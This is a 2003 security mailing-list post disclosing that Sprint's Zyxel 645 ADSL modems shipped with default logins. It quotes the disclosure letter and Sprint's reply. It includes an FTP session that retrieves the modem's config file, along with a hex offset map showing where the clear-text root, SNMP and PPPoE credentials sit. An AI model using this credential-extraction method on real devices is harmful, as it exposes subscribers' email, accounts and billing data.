Re: SPRINT ADSL [Zyxel 645 Series Modem]

["http-equiv () excite com" <http-equiv () malware com>]

FX <fx () phenoelit de> said:

> > ftp> open malware.com
> > Connected to malware.com.
> > 220 Sprint FTP version 1.0 ready at Wed Jan  5 17:20:47 2000
> > User (malware.com:(none)):
> > 331 Enter PASS command
> > Password:
> > 230 Logged in
> > ftp> get rom-0
>
> I'm not sure if this applies to the Zyxel boxes you found, but 
there is another
> file called spt.dat, which contains all password and account 
information. More
> details can be found here: 
http://www.DarkLab.org/archive/msg00144.html
> FX

Yes FX you are correct. After a good swift kick in the nuts, Sprint 
has done and is still doing an admirable job in fixing this. 

Sufficient time has elapsed to advise this.

The only additional note is to strongly suggest that the users change 
their master account password as well:

<!-- 

Friday, January 24, 2003

Ladies and Gentlemen:

Reference the information provided to you on Monday and Tuesday of 
this week and subsequent announcements on Thursday this week:

http://www.wired.com/news/infostructure/0,1377,57342,00.html

http://www.securityfocusonline.com/archive/1/307793/2003-01-22/2003-
01-28/0

This message serves to inform you that your entire user base is open 
to full and complete remote compromise through this modem.

This includes full access to:

1. the internet via adsl and dialup connection
2. pop3 email retrieval
3. webmail 
4. web based user account management including user name and address 
and billing details

The problem lies in the fact that the modem you have provided to your 
user base is installed with a commonly known default login and 
password. Once access has been gained to this modem, it is trivially 
possible to retrieve a storage file contained within the modem which 
includes the user's name and password.

With this information it is possible to access all aspects of the 
user account as described above.

Example:

00000020: 1234
00000042: malst
00000060: Sprint
00000082: mal Ware
000000AC: public
000000CC: public
000000EC: public
00001086: dhcppc
00001C54: MyISP
00001DDE: grandpamalware
00001DEB: malware.
00001DFE: ware
00002112: mal

0x20 the root password in clear
0x40 SNMP Location
0x60 Device name
0x80 SNMP Sys Contact
0xac SNMP read community
0xcc SNMP read community
0xec SNMP read community
0x188 SUA Server IP address
0x1c54 First PPPoE Account config name (Default: ChangeMe)
0x1dde First PPPoe Username
0x1dfe First PPPoe Password
0x21dc Second PPPeE Account config name

Where username: grandpamalware () malware com and pass: ware inputted 
into a dialup connection with specific access number, will function, 
where inputted into a pop3 mail client with corresponding pop3 
server, will retrieve mail accordingly, where inputted into a web 
based mail access, will allow for access and where access to 
myaccount information is required, will allow for authentication and 
login.

In other words, the single user id and email address along with the 
single pass all contained within the file on the modem will allow 
access to everything!

The file on the modem is a small dat file called spt.dat therein, in 
clear text, lies all this information.

This information is already in the public domain and you need to 
urgently fire-wall your user base ports http, telnet, and ftp while 
you solve this problem. You must assume that malicious parties are 
well-aware
of and are probably exploiting it right now.

Today is Friday. Nothing has been done about this to date. Your 
entire user base is at risk.

We expect some sort of substantial action by Tuesday latest. Failing 
that, we will discuss this in technical depth on all relevant 
security lists.

End Call

cc: 

Wired
@pc-radio.com
Symantec
@securityfocus.com
CERT
@cert.org 
Earthlink
@corp.earthlink.net
abuse () earthlink net
security@corp.earthlink
Sprint
@mail.sprint.com
noc () sprint net
abuse () sprint net
security () sprint net


-- 
http://www.malware.com

 -->

Date: Tue, 28 Jan 2003 17:01:25 -0500

<!-- 

Sprint is working closely with its DSL modem manufacturer to ensure 
the
security and integrity of its Sprint-provided DSL equipment. Sprint is
dedicated to providing its customers a secure broadband Internet
network, and to that end, recently identified an additional layer of
security that can help protect customers' DSL modems.<?xml:namespace
prefix = o ns = "urn:schemas-microsoft-com:office:office" /> 

The company began notifying its customers - one-by-one - in a very
targeted initiative to provide guidance on ensuring their DSL service 
is
reliable and secure. We are consulting with our customers and walking
them through the relatively simple steps to ensure an additional layer
of security on their modem. 

Proactively, we are reaching out to our customers in three different
ways - outbound telephone calls, e-mail messages and a customer letter
mailed today (Jan. 28). These communications are directed at helping
ensure the safety and security of customers' DSL modems.

Additionally, we are informing all DSL customers who call our 
technical
assistance group of the procedures for securing their modem.

Sprint is committed to providing safe, reliable and secure voice and
data services to all its customers. When an event occurs that 
threatens
that safety, reliability and security, we take it very seriously and 
we
will continue to do everything we can to contact our customers.



Director-Customer Operations

 -->

Notes: users can address the issue here:

http://csb.sprint.com/home/local/dslhelp/release645m.html


-- 
http://www.malware.com